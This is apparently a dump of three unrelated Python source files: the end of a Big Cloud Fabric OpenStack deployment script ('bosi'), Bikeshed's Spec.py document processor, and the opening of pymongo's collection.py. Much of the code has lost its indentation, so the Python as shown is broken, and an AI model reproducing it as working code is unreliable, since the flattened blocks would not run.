for hostname, node in node_dic.iteritems():
if node.skip:
safe_print("skip node %(fqdn)s due to %(error)s\n" %
{'fqdn': node.fqdn, 'error': node.error})
continue
if node.tag != node.env_tag:
safe_print("skip node %(fqdn)s due to mismatched tag\n" %
{'fqdn': node.fqdn})
continue
if node.deploy_mode == const.T6 and node.role == const.ROLE_COMPUTE:
Helper.generate_csr(node)
safe_print("Finish generating csr for virtual switches.\n")
return
# copy neutron config from neutron server to setup node
for hostname, node in node_dic.iteritems():
if node.role == const.ROLE_NEUTRON_SERVER:
controller_nodes.append(node)
Helper.copy_neutron_config_from_controllers(controller_nodes)
# check if vlan is the tenant network type for fuel environment
if not Helper.check_if_vlan_is_used(controller_nodes):
safe_print("tenant network type is not vlan. Stop deploying.\n")
return
# prepare keystone client from /etc/neutron/api-paste.ini
#Helper.prepare_keystone_client(controller_nodes)
# Generate scripts for each node
for hostname, node in node_dic.iteritems():
if support:
support_node_q.put(node)
if node.skip:
safe_print("skip node %(fqdn)s due to %(error)s\n" %
{'fqdn': node.fqdn, 'error': node.error})
continue
if node.tag != node.env_tag:
safe_print("skip node %(fqdn)s due to mismatched tag\n" %
{'fqdn': node.fqdn})
continue
if node.os == const.CENTOS:
Helper.generate_scripts_for_centos(node)
elif node.os == const.UBUNTU:
Helper.generate_scripts_for_ubuntu(node)
elif node.os == const.REDHAT:
Helper.generate_scripts_for_redhat(node)
if node.role == const.ROLE_NEUTRON_SERVER:
controller_node_q.put(node)
else:
# python doesn't have deep copy for Queue, hence add to all
node_q.put(node)
verify_node_q.put(node)
if node.deploy_mode == const.T6 and node.role == const.ROLE_COMPUTE:
certify_node_q.put(node)
if node.rhosp:
Helper.chmod_node(node)
with open(const.LOG_FILE, "a") as log_file:
version = Helper.run_command_on_local("pip show bosi")
log_file.write(str(version))
for hostname, node in node_dic.iteritems():
log_file.write(str(node))
if support:
safe_print("Start to collect logs.\n")
# copy installer logs to ~/support
Helper.run_command_on_local("mkdir -p %s" % const.SUPPORT_DIR)
Helper.run_command_on_local("cp -r %(src)s %(dst)s" %
{"src": const.LOG_FILE,
"dst": const.SUPPORT_DIR})
Helper.run_command_on_local("cp -r %(setup_node_dir)s/%(generated_script_dir)s %(dst)s" %
{"setup_node_dir": env.setup_node_dir,
"generated_script_dir": const.GENERATED_SCRIPT_DIR,
"dst": const.SUPPORT_DIR})
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=support_node_setup,
args=(support_node_q,))
t.daemon = True
t.start()
support_node_q.join()
# compress ~/support
Helper.run_command_on_local("cd /tmp; tar -czf support.tar.gz support")
safe_print("Finish collecting logs. logs are at /tmp/support.tar.gz.\n")
return
# in case of verify_only or certificate_only, do not deploy
if (not verify_only) and (not certificate_only):
# Use single thread to setup controller nodes
t = threading.Thread(target=worker_setup_node,
args=(controller_node_q,))
t.daemon = True
t.start()
controller_node_q.join()
# Use multiple threads to setup compute nodes
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=worker_setup_node, args=(node_q,))
t.daemon = True
t.start()
node_q.join()
sorted_time_dict = OrderedDict(sorted(time_dict.items(),
key=lambda x: x[1]))
for fqdn, h_time in sorted_time_dict.items():
safe_print("node: %(fqdn)s, time: %(time).2f\n" %
{'fqdn': fqdn, 'time': h_time})
safe_print("Big Cloud Fabric deployment finished! "
"Check %(log)s on each node for details.\n" %
{'log': const.LOG_FILE})
if certificate_dir or certificate_only:
# certify each node
safe_print("Start to certify virtual switches.\n")
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=certify_node_setup,
args=(certify_node_q,))
t.daemon = True
t.start()
certify_node_q.join()
safe_print('Certifying virtual switches done.\n')
if verify or verify_only:
# verify each node and post results
safe_print("Verifying deployment for all compute nodes.\n")
for i in range(const.MAX_WORKERS):
t = threading.Thread(target=verify_node_setup,
args=(verify_node_q,))
t.daemon = True
t.start()
verify_node_q.join()
# print status
# success nodes
safe_print('Deployed successfully to: \n')
for node_element in node_pass:
safe_print(node_element + '\n')
# failed nodes
safe_print('Deployment to following failed: \n')
for node_element in node_fail:
safe_print(str(node_element) + ' : '
+ str(node_fail[node_element]) + '\n')
def main():
# Parse configuration
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--config-file", required=True,
help="BCF YAML configuration file")
parser.add_argument("-m", "--deploy-mode", required=False,
                        choices=['pfabric', 'pvfabric'])
parser.add_argument('-f', "--fuel-cluster-id", required=False,
help=("Fuel cluster ID. Fuel settings may override "
"YAML configuration. "
"Please refer to config.yaml"))
parser.add_argument('-r', "--rhosp", action='store_true', default=False,
help="red hat openstack director is the installer "
"(upgrade only supported).")
parser.add_argument('-t', "--tag", required=False,
help="Deploy to tagged nodes only.")
parser.add_argument('--cleanup', action='store_true', default=False,
help="Clean up existing routers, "
"networks and projects.")
parser.add_argument('--skip-ivs-version-check', action='store_true',
default=False, help="Skip ivs version check.")
parser.add_argument('--verify', action='store_true', default=False,
help="Verify service status for compute nodes "
"after deployment.")
parser.add_argument('--verifyonly', action='store_true', default=False,
help=("Verify service status for compute nodes "
"after deployment. Does not deploy BCF "
"specific changes."))
parser.add_argument('--certificate-dir', required=False,
help=("The directory that has the certificates for "
"virtual switches. This option requires certificates "
"to be ready in the directory. This option will deploy "
"certificate to the corresponding node based on the mac "
"address. Virtual switch will talk TLS afterward."))
parser.add_argument('--certificate-only', action='store_true', default=False,
help=("By turning on this flag, bosi will only deploy certificate "
"to each node. It requires --certificate-dir to be specified."))
parser.add_argument('--generate-csr', action='store_true', default=False,
help=("By turning on this flag, bosi will generate csr on behalf of "
"virtual switches. User needs to certify these csr and use "
"--certificate-dir to specify the certificate directory."))
parser.add_argument('--support', action='store_true', default=False,
help=("Collect openstack logs."))
parser.add_argument('--upgrade-dir', required=False,
help=("The directory that has the packages for upgrade."))
parser.add_argument('--offline-dir', required=False,
help=("The directory that has the packages for offline installation."))
parser.add_argument('--sriov', action='store_true', default=False,
help=("Deploy changes necessary for SRIOV mode to "
"nodes specified in config.yaml. Only works "
"with RHOSP."))
parser.add_argument('--dpdk', action='store_true', default=False,
help=("Deploy changes necessary for DPDK mode to "
"nodes specified in config.yaml. Only works "
"with RHOSP in pfabric mode."))
args = parser.parse_args()
if args.fuel_cluster_id and args.rhosp:
safe_print("Cannot have both fuel and rhosp as openstack installer.\n")
return
if args.rhosp and not (args.upgrade_dir or args.sriov or args.dpdk):
safe_print("BOSI for RHOSP only supports upgrading packages or "
"SRIOV/DPDK deployment.\n"
"Please specify --upgrade-dir or --sriov or --dpdk.\n")
return
if args.rhosp and args.dpdk:
if args.deploy_mode != 'pfabric':
safe_print("BOSI for RHOSP DPDK is only supported in pfabric "
"mode. \n"
"Please change deployment mode to pfabric.")
return
if args.offline_dir and args.upgrade_dir:
safe_print("Cannot have both --offline-dir and --upgrade-dir. Please specify one.")
return
if args.certificate_only and (not args.certificate_dir):
safe_print("--certificate-only requires the existence of --certificate-dir.\n")
return
    if args.sriov and not args.rhosp:
        safe_print("SRIOV is only supported for RHOSP. \n"
                   "Please specify --rhosp.\n")
        return
with open(args.config_file, 'r') as config_file:
config = yaml.load(config_file)
deploy_bcf(config, args.deploy_mode, args.fuel_cluster_id, args.rhosp,
args.tag, args.cleanup,
args.verify, args.verifyonly,
args.skip_ivs_version_check,
args.certificate_dir, args.certificate_only,
args.generate_csr, args.support,
args.upgrade_dir, args.offline_dir, args.sriov, args.dpdk)
if __name__ == '__main__':
main()
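# A minimal invocation sketch (the entry-point name and file paths are
# illustrative; the flags map 1:1 to the argparse options in main()):
#   <bosi entry point> -c config.yaml --verify
#   <bosi entry point> -c config.yaml -r --sriov -t rack1
#   <bosi entry point> -c config.yaml -r --upgrade-dir /path/to/packages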
|
Spec.py
|
# -*- coding: utf-8 -*-
import glob
import io
import json
import sys
import os
from collections import defaultdict, OrderedDict
from datetime import datetime
from . import biblio
from . import boilerplate
from . import caniuse
from . import mdnspeclinks
from . import config
from . import constants
from . import datablocks
from . import extensions
from . import fingerprinting
from . import func
from . import headings
from . import highlight
from . import html
from . import idl
from . import includes
from . import inlineTags
from . import lint
from . import markdown
from . import metadata
from . import shorthands
from . import wpt
from .html import *
from .InputSource import InputSource, FileInputSource, StdinInputSource
from .Line import Line
from .messages import *
from .refs import ReferenceManager
from .unsortedJunk import *
class Spec(object):
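    # One Bikeshed document: wraps an input source, accumulates metadata and
    # cross-reference state, and is driven by preprocess() (parse + transform)
    # followed by finish()/serialize() (render to HTML).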
def __init__(self, inputFilename, debug=False, token=None, lineNumbers=False, fileRequester=None, testing=False):
self.valid = False
self.lineNumbers = lineNumbers
if lineNumbers:
# line-numbers are too hacky, so force this to be a dry run
constants.dryRun = True
if inputFilename is None:
inputFilename = findImplicitInputFile()
if inputFilename is None: # still
die("No input file specified, and no *.bs or *.src.html files found in current directory.\nPlease specify an input file, or use - to pipe from STDIN.")
return
self.inputSource = InputSource(inputFilename)
self.debug = debug
self.token = token
self.testing = testing
if fileRequester is None:
self.dataFile = config.defaultRequester
else:
self.dataFile = fileRequester
self.valid = self.initializeState()
def initializeState(self):
self.normativeRefs = {}
self.informativeRefs = {}
self.refs = ReferenceManager(fileRequester=self.dataFile, testing=self.testing)
self.externalRefsUsed = defaultdict(lambda:defaultdict(dict))
self.md = None
self.mdBaseline = metadata.MetadataManager()
self.mdDocument = None
self.mdCommandLine = metadata.MetadataManager()
self.mdDefaults = None
self.mdOverridingDefaults = None
self.biblios = {}
self.typeExpansions = {}
        self.macros = defaultdict(lambda: "???")
self.canIUse = {}
self.mdnSpecLinks = {}
self.widl = idl.getParser()
self.testSuites = json.loads(self.dataFile.fetch("test-suites.json", str=True))
self.languages = json.loads(self.dataFile.fetch("languages.json", str=True))
self.extraStyles = defaultdict(str)
self.extraStyles['style-md-lists'] = styleMdLists
self.extraStyles['style-autolinks'] = styleAutolinks
self.extraStyles['style-selflinks'] = styleSelflinks
self.extraStyles['style-counters'] = styleCounters
self.extraScripts = defaultdict(str)
try:
inputContent = self.inputSource.read()
self.lines = inputContent.lines
if inputContent.date is not None:
self.mdBaseline.addParsedData("Date", inputContent.date)
except OSError:
die("Couldn't find the input file at the specified location '{0}'.", self.inputSource)
return False
except IOError:
die("Couldn't open the input file '{0}'.", self.inputSource)
return False
return True
def preprocess(self):
self.assembleDocument()
self.processDocument()
return self
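    # Typical driver flow, as a sketch (the real CLI also fills mdCommandLine
    # with command-line metadata before preprocessing):
    #   doc = Spec("index.bs")
    #   if doc.valid:
    #       doc.preprocess()
    #       doc.finish("index.html")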
def assembleDocument(self):
# Textual hacks
stripBOM(self)
if self.lineNumbers:
self.lines = hackyLineNumbers(self.lines)
self.lines = markdown.stripComments(self.lines)
# Extract and process metadata
self.lines, self.mdDocument = metadata.parse(lines=self.lines)
# First load the metadata sources from 'local' data
self.md = metadata.join(self.mdBaseline, self.mdDocument, self.mdCommandLine)
# Using that to determine the Group and Status, load the correct defaults.include boilerplate
self.mdDefaults = metadata.fromJson(data=config.retrieveBoilerplateFile(self, 'defaults', error=True), source="defaults")
self.md = metadata.join(self.mdBaseline, self.mdDefaults, self.mdDocument, self.mdCommandLine)
# Using all of that, load up the text macros so I can sub them into the computed-metadata file.
self.md.fillTextMacros(self.macros, doc=self)
jsonEscapedMacros = {k: json.dumps(v)[1:-1] for k,v in self.macros.items()}
computedMdText = replaceMacros(config.retrieveBoilerplateFile(self, 'computed-metadata', error=True), macros=jsonEscapedMacros)
self.mdOverridingDefaults = metadata.fromJson(data=computedMdText, source="computed-metadata")
self.md = metadata.join(self.mdBaseline, self.mdDefaults, self.mdOverridingDefaults, self.mdDocument, self.mdCommandLine)
# Finally, compute the "implicit" things.
self.md.computeImplicitMetadata(doc=self)
# And compute macros again, in case the preceding steps changed them.
self.md.fillTextMacros(self.macros, doc=self)
self.md.validate()
extensions.load(self)
# Initialize things
self.refs.initializeRefs(self)
self.refs.initializeBiblio()
# Deal with further <pre> blocks, and markdown
self.lines = datablocks.transformDataBlocks(self, self.lines)
self.lines = markdown.parse(self.lines, self.md.indent, opaqueElements=self.md.opaqueElements, blockElements=self.md.blockElements)
# Note that, currently, markdown.parse returns an array of strings, not of Line objects.
self.refs.setSpecData(self.md)
# Convert to a single string of html now, for convenience.
self.html = ''.join(l.text for l in self.lines)
boilerplate.addHeaderFooter(self)
self.html = self.fixText(self.html)
# Build the document
self.document = parseDocument(self.html)
self.head = find("head", self)
self.body = find("body", self)
correctH1(self)
includes.processInclusions(self)
metadata.parseDoc(self)
return self
def processDocument(self):
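        # Broad phases: fill and clean containers/boilerplate, expand
        # shorthands and inline tags, resolve dfns/IDL/biblio/autolinks,
        # build the index/TOC/annotation sections, then lint and do the
        # final HTML cleanup.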
# Fill in and clean up a bunch of data
self.fillContainers = locateFillContainers(self)
lint.exampleIDs(self)
boilerplate.addBikeshedVersion(self)
boilerplate.addCanonicalURL(self)
boilerplate.addFavicon(self)
boilerplate.addSpecVersion(self)
boilerplate.addStatusSection(self)
boilerplate.addLogo(self)
boilerplate.addCopyright(self)
boilerplate.addSpecMetadataSection(self)
boilerplate.addAbstract(self)
boilerplate.addExpiryNotice(self)
boilerplate.addObsoletionNotice(self)
boilerplate.addAtRisk(self)
addNoteHeaders(self)
boilerplate.removeUnwantedBoilerplate(self)
shorthands.transformShorthandElements(self)
shorthands.transformProductionPlaceholders(self)
shorthands.transformMaybePlaceholders(self)
shorthands.transformAutolinkShortcuts(self)
shorthands.transformProductionGrammars(self)
inlineTags.processTags(self)
canonicalizeShortcuts(self)
addImplicitAlgorithms(self)
fixManualDefTables(self)
headings.processHeadings(self)
checkVarHygiene(self)
processIssuesAndExamples(self)
idl.markupIDL(self)
inlineRemoteIssues(self)
wpt.processWptElements(self)
# Handle all the links
processBiblioLinks(self)
processDfns(self)
idl.processIDL(self)
fillAttributeInfoSpans(self)
formatArgumentdefTables(self)
formatElementdefTables(self)
processAutolinks(self)
biblio.dedupBiblioReferences(self)
verifyUsageOfAllLocalBiblios(self)
caniuse.addCanIUsePanels(self)
mdnspeclinks.addMdnPanels(self)
boilerplate.addIndexSection(self)
boilerplate.addExplicitIndexes(self)
boilerplate.addStyles(self)
boilerplate.addReferencesSection(self)
boilerplate.addPropertyIndex(self)
boilerplate.addIDLSection(self)
boilerplate.addIssuesSection(self)
boilerplate.addCustomBoilerplate(self)
headings.processHeadings(self, "all") # again
boilerplate.removeUnwantedBoilerplate(self)
boilerplate.addTOCSection(self)
addSelfLinks(self)
processAutolinks(self)
boilerplate.addAnnotations(self)
boilerplate.removeUnwantedBoilerplate(self)
highlight.addSyntaxHighlighting(self)
boilerplate.addBikeshedBoilerplate(self)
fingerprinting.addTrackingVector(self)
fixIntraDocumentReferences(self)
fixInterDocumentReferences(self)
removeMultipleLinks(self)
forceCrossorigin(self)
lint.brokenLinks(self)
lint.accidental2119(self)
lint.missingExposed(self)
lint.requiredIDs(self)
lint.unusedInternalDfns(self)
# Any final HTML cleanups
cleanupHTML(self)
if self.md.prepTR:
# Don't try and override the W3C's icon.
for el in findAll("[rel ~= 'icon']", self):
removeNode(el)
# Make sure the W3C stylesheet is after all other styles.
for el in findAll("link", self):
if el.get("href").startswith("https://www.w3.org/StyleSheets/TR"):
appendChild(find("head", self), el)
# Ensure that all W3C links are https.
for el in findAll("a", self):
href = el.get("href", "")
if href.startswith("http://www.w3.org") or href.startswith("http://lists.w3.org"):
el.set("href", "https" + href[4:])
text = el.text or ""
if text.startswith("http://www.w3.org") or text.startswith("http://lists.w3.org"):
el.text = "https" + text[4:]
extensions.BSPrepTR(self)
return self
def serialize(self):
rendered = html.Serializer(self.md.opaqueElements, self.md.blockElements).serialize(self.document)
rendered = finalHackyCleanup(rendered)
return rendered
def fixMissingOutputFilename(self, outputFilename):
if outputFilename is None:
# More sensible defaults!
if not isinstance(self.inputSource, FileInputSource):
outputFilename = "-"
elif self.inputSource.sourceName.endswith(".bs"):
outputFilename = self.inputSource.sourceName[0:-3] + ".html"
            elif self.inputSource.sourceName.endswith(".src.html"):
outputFilename = self.inputSource.sourceName[0:-9] + ".html"
else:
outputFilename = "-"
return outputFilename
def finish(self, outputFilename=None):
self.printResultMessage()
outputFilename = self.fixMissingOutputFilename(outputFilename)
rendered = self.serialize()
if not constants.dryRun:
try:
if outputFilename == "-":
                    sys.stdout.write(rendered)
else:
with io.open(outputFilename, "w", encoding="utf-8") as f:
f.write(rendered)
except Exception as e:
die("Something prevented me from saving the output document to {0}:\n{1}", outputFilename, e)
def printResultMessage(self):
# If I reach this point, I've succeeded, but maybe with reservations.
fatals = messageCounts['fatal']
links = messageCounts['linkerror']
warnings = messageCounts['warning']
if self.lineNumbers:
warn("Because --line-numbers was used, no output was saved.")
if fatals:
success("Successfully generated, but fatal errors were suppressed")
return
if links:
success("Successfully generated, with {0} linking errors", links)
return
if warnings:
success("Successfully generated, with warnings")
return
def watch(self, outputFilename, port=None, localhost=False):
import time
outputFilename = self.fixMissingOutputFilename(outputFilename)
if self.inputSource.mtime() is None:
            die("Watch mode doesn't support {}".format(self.inputSource))
            return
if outputFilename == "-":
die("Watch mode doesn't support streaming to STDOUT.")
return
if port:
# Serve the folder on an HTTP server
import http.server
import socketserver
import threading
class SilentServer(http.server.SimpleHTTPRequestHandler):
def log_message(*args):
pass
socketserver.TCPServer.allow_reuse_address = True
server = socketserver.TCPServer(
("localhost" if localhost else "", port), SilentServer)
print("Serving at port {0}".format(port))
thread = threading.Thread(target = server.serve_forever)
thread.daemon = True
thread.start()
else:
server = None
mdCommandLine = self.mdCommandLine
try:
lastInputModified = self.inputSource.mtime()
self.preprocess()
self.finish(outputFilename)
p("==============DONE==============")
try:
while True:
inputModified = self.inputSource.mtime()
if inputModified > lastInputModified:
resetSeenMessages()
lastInputModified = inputModified
formattedTime = datetime.fromtimestamp(inputModified).strftime("%H:%M:%S")
p("Source file modified at {0}. Rebuilding...".format(formattedTime))
self.initializeState()
self.mdCommandLine = mdCommandLine
self.preprocess()
self.finish(outputFilename)
p("==============DONE==============")
time.sleep(1)
except KeyboardInterrupt:
p("Exiting~")
if server:
server.shutdown()
thread.join()
sys.exit(0)
except Exception as e:
die("Something went wrong while watching the file:\n{0}", e)
def fixText(self, text, moreMacros={}):
# Do several textual replacements that need to happen *before* the document is parsed as HTML.
# If markdown shorthands are on, remove all `foo`s while processing,
# so their contents don't accidentally trigger other stuff.
# Also handle markdown escapes.
if "markdown" in self.md.markupShorthands:
textFunctor = MarkdownCodeSpans(text)
else:
textFunctor = func.Functor(text)
macros = dict(self.macros, **moreMacros)
textFunctor = textFunctor.map(curry(replaceMacros, macros=macros))
textFunctor = textFunctor.map(fixTypography)
if "css" in self.md.markupShorthands:
textFunctor = textFunctor.map(replaceAwkwardCSSShorthands)
return textFunctor.extract()
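    # For example, assuming a [TITLE] text macro has been filled in,
    #   doc.fixText("<h1>[TITLE]</h1>")
    # yields "<h1>My Spec Title</h1>" (illustrative title), with typography
    # fixes applied by fixTypography along the way.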
def printTargets(self):
p("Exported terms:")
for el in findAll("[data-export]", self):
for term in config.linkTextsFromElement(el):
p(" " + term)
p("Unexported terms:")
for el in findAll("[data-noexport]", self):
for term in config.linkTextsFromElement(el):
p(" " + term)
def isOpaqueElement(self, el):
if el.tag in self.md.opaqueElements:
return True
if el.get("data-opaque") is not None:
return True
return False
def findImplicitInputFile():
'''
Find what input file the user *probably* wants to use,
by scanning the current folder.
In preference order:
1. index.bs
2. Overview.bs
3. the first file with a .bs extension
4. the first file with a .src.html extension
'''
import glob
import os
if os.path.isfile("index.bs"):
return "index.bs"
if os.path.isfile("Overview.bs"):
return "Overview.bs"
allBs = glob.glob("*.bs")
if allBs:
return allBs[0]
allHtml = glob.glob("*.src.html")
if allHtml:
return allHtml[0]
return None
constants.specClass = Spec
styleMdLists = '''
/* This is a weird hack for me not yet following the commonmark spec
   regarding paragraphs and lists. */
[data-md] > :first-child {
margin-top: 0;
}
[data-md] > :last-child {
margin-bottom: 0;
}'''
styleAutolinks = '''
.css.css, .property.property, .descriptor.descriptor {
color: #005a9c;
font-size: inherit;
font-family: inherit;
}
.css::before, .property::before, .descriptor::before {
content: "‘";
}
.css::after, .property::after, .descriptor::after {
content: "’";
}
.property, .descriptor {
/* Don't wrap property and descriptor names */
white-space: nowrap;
}
.type { /* CSS value <type> */
font-style: italic;
}
pre .property::before, pre .property::after {
content: "";
}
[data-link-type="property"]::before,
[data-link-type="propdesc"]::before,
[data-link-type="descriptor"]::before,
[data-link-type="value"]::before,
[data-link-type="function"]::before,
[data-link-type="at-rule"]::before,
[data-link-type="selector"]::before,
[data-link-type="maybe"]::before {
content: "‘";
}
[data-link-type="property"]::after,
[data-link-type="propdesc"]::after,
[data-link-type="descriptor"]::after,
[data-link-type="value"]::after,
[data-link-type="function"]::after,
[data-link-type="at-rule"]::after,
[data-link-type="selector"]::after,
[data-link-type="maybe"]::after {
content: "’";
}
[data-link-type].production::before,
[data-link-type].production::after,
.prod [data-link-type]::before,
.prod [data-link-type]::after {
content: "";
}
[data-link-type=element],
[data-link-type=element-attr] {
font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace;
font-size: .9em;
}
[data-link-type=element]::before { content: "<" }
[data-link-type=element]::after { content: ">" }
[data-link-type=biblio] {
white-space: pre;
}'''
styleSelflinks = '''
.heading, .issue, .note, .example, li, dt {
position: relative;
}
a.self-link {
position: absolute;
top: 0;
left: calc(-1 * (3.5rem - 26px));
width: calc(3.5rem - 26px);
height: 2em;
text-align: center;
border: none;
transition: opacity .2s;
opacity: .5;
}
a.self-link:hover {
opacity: 1;
}
.heading > a.self-link {
font-size: 83%;
}
li > a.self-link {
left: calc(-1 * (3.5rem - 26px) - 2em);
}
dfn > a.self-link {
top: auto;
left: auto;
opacity: 0;
width: 1.5em;
height: 1.5em;
background: gray;
color: white;
font-style: normal;
transition: opacity .2s, background-color .2s, color .2s;
}
dfn:hover > a.self-link {
opacity: 1;
}
dfn > a.self-link:hover {
color: black;
}
a.self-link::before { content: "¶"; }
.heading > a.self-link::before { content: "§"; }
dfn > a.self-link::before { content: "#"; }'''
styleCounters = '''
body {
counter-reset: example figure issue;
}
.issue {
counter-increment: issue;
}
.issue:not(.no-marker)::before {
content: "Issue " counter(issue);
}
.example {
counter-increment: example;
}
.example:not(.no-marker)::before {
content: "Example " counter(example);
}
.invalid.example:not(.no-marker)::before,
.illegal.example:not(.no-marker)::before {
    content: "Invalid Example " counter(example);
}
figcaption {
counter-increment: figure;
}
figcaption:not(.no-marker)::before {
content: "Figure " counter(figure) " ";
}'''
|
collection.py
|
# Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collection level utilities for Mongo."""
import datetime
import warnings
from bson.code import Code
from bson.objectid import ObjectId
from bson.py3compat import (_unicode,
abc,
integer_types,
string_type)
from bson.raw_bson import RawBSONDocument
from bson.codec_options import CodecOptions
from bson.son import SON
from pymongo import (common,
helpers,
message)
from pymongo.bulk import BulkOperationBuilder, _Bulk
from pymongo.command_cursor import CommandCursor, RawBatchCommandCursor
from pymongo.common import ORDERED_TYPES
from pymongo.collation import validate_collation_or_none
from pymongo.change_stream import CollectionChangeStream
from pymongo.cursor import Cursor, RawBatchCursor
from pymongo.errors import (BulkWriteError,
ConfigurationError,
InvalidName,
OperationFailure)
from pymongo.helpers import (_check_write_command_response,
_raise_last_error)
from pymongo.message import _UNICODE_REPLACE_CODEC_OPTIONS
from pymongo.operations import IndexModel
from pymongo.read_preferences import ReadPreference
from pymongo.results import (BulkWriteResult,
DeleteResult,
InsertOneResult,
InsertManyResult,
UpdateResult)
from pymongo.write_concern import WriteConcern
_NO_OBJ_ERROR = "No matching object found"
_UJOIN = u"%s.%s"
class ReturnDocument(object):
"""An enum used with
:meth:`~pymongo.collection.Collection.find_one_and_replace` and
:meth:`~pymongo.collection.Collection.find_one_and_update`.
"""
BEFORE = False
"""Return the original document before it was updated/replaced, or
``None`` if no document matches the query.
"""
AFTER = True
"""Return the updated/replaced or inserted document."""
class Collection(common.BaseObject):
"""A Mongo collection.
"""
def __init__(self, database, name, create=False, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
session=None, **kwargs):
"""Get / create a Mongo collection.
Raises :class:`TypeError` if `name` is not an instance of
:class:`basestring` (:class:`str` in python 3). Raises
:class:`~pymongo.errors.InvalidName` if `name` is not a valid
collection name. Any additional keyword arguments will be used
as options passed to the create command. See
:meth:`~pymongo.database.Database.create_collection` for valid
options.
If `create` is ``True``, `collation` is specified, or any additional
keyword arguments are present, a ``create`` command will be
sent, using ``session`` if specified. Otherwise, a ``create`` command
will not be sent and the collection will be created implicitly on first
use. The optional ``session`` argument is *only* used for the ``create``
        command; it is not associated with the collection afterward.
:Parameters:
- `database`: the database to get a collection from
- `name`: the name of the collection to get
- `create` (optional): if ``True``, force collection
creation even without options being set
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) database.codec_options is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) database.read_preference is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) database.write_concern is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) database.read_concern is used.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. If a collation is provided,
it will be passed to the create collection command. This option is
only supported on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession` that is used with
the create collection command
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.2
Added the read_concern option.
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
Removed the uuid_subtype attribute.
:class:`~pymongo.collection.Collection` no longer returns an
instance of :class:`~pymongo.collection.Collection` for attribute
names with leading underscores. You must use dict-style lookups
instead::
collection['__my_collection__']
Not:
collection.__my_collection__
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionadded:: 2.1
uuid_subtype attribute
.. mongodoc:: collections
"""
super(Collection, self).__init__(
codec_options or database.codec_options,
read_preference or database.read_preference,
write_concern or database.write_concern,
read_concern or database.read_concern)
if not isinstance(name, string_type):
raise TypeError("name must be an instance "
"of %s" % (string_type.__name__,))
if not name or ".." in name:
raise InvalidName("collection names cannot be empty")
if "$" in name and not (name.startswith("oplog.$main") or
name.startswith("$cmd")):
raise InvalidName("collection names must not "
"contain '$': %r" % name)
if name[0] == "." or name[-1] == ".":
raise InvalidName("collection names must not start "
"or end with '.': %r" % name)
if "\x00" in name:
raise InvalidName("collection names must not contain the "
"null character")
collation = validate_collation_or_none(kwargs.pop('collation', None))
self.__database = database
self.__name = _unicode(name)
self.__full_name = _UJOIN % (self.__database.name, self.__name)
if create or kwargs or collation:
self.__create(kwargs, collation, session)
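        # Decode write-command replies with the 'replace' error handler so
        # replies containing invalid UTF-8 (e.g. in error messages) do not
        # raise during decoding.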
self.__write_response_codec_options = self.codec_options._replace(
unicode_decode_error_handler='replace',
document_class=dict)
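    # Explicit creation with options, as a sketch (collection name and option
    # values are illustrative):
    #   events = Collection(db, "events", create=True, capped=True,
    #                       size=2 ** 20)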
def _socket_for_reads(self, session):
return self.__database.client._socket_for_reads(
self._read_preference_for(session))
def _socket_for_primary_reads(self, session):
read_pref = ((session and session._txn_read_preference())
or ReadPreference.PRIMARY)
return self.__database.client._socket_for_reads(read_pref), read_pref
def _socket_for_writes(self):
return self.__database.client._socket_for_writes()
def _command(self, sock_info, command, slave_ok=False,
read_preference=None,
codec_options=None, check=True, allowable_errors=None,
read_concern=None,
write_concern=None,
collation=None,
session=None,
retryable_write=False):
"""Internal command helper.
:Parameters:
- `sock_info` - A SocketInfo instance.
- `command` - The command itself, as a SON instance.
- `slave_ok`: whether to set the SlaveOkay wire protocol bit.
- `codec_options` (optional) - An instance of
:class:`~bson.codec_options.CodecOptions`.
- `check`: raise OperationFailure if there are errors
- `allowable_errors`: errors to ignore if `check` is True
- `read_concern` (optional) - An instance of
:class:`~pymongo.read_concern.ReadConcern`.
- `write_concern`: An instance of
:class:`~pymongo.write_concern.WriteConcern`. This option is only
valid for MongoDB 3.4 and above.
- `collation` (optional) - An instance of
:class:`~pymongo.collation.Collation`.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
The result document.
"""
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
self.__database.name,
command,
slave_ok,
read_preference or self._read_preference_for(session),
codec_options or self.codec_options,
check,
allowable_errors,
read_concern=read_concern,
write_concern=write_concern,
parse_write_concern_error=True,
collation=collation,
session=s,
client=self.__database.client,
retryable_write=retryable_write)
def __create(self, options, collation, session):
"""Sends a create command with the given options.
"""
cmd = SON([("create", self.__name)])
if options:
if "size" in options:
options["size"] = float(options["size"])
cmd.update(options)
with self._socket_for_writes() as sock_info:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
write_concern=self._write_concern_for(session),
collation=collation, session=session)
def __getattr__(self, name):
"""Get a sub-collection of this collection by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
if name.startswith('_'):
full_name = _UJOIN % (self.__name, name)
raise AttributeError(
"Collection has no attribute %r. To access the %s"
" collection, use database['%s']." % (
name, full_name, full_name))
return self.__getitem__(name)
def __getitem__(self, name):
return Collection(self.__database,
_UJOIN % (self.__name, name),
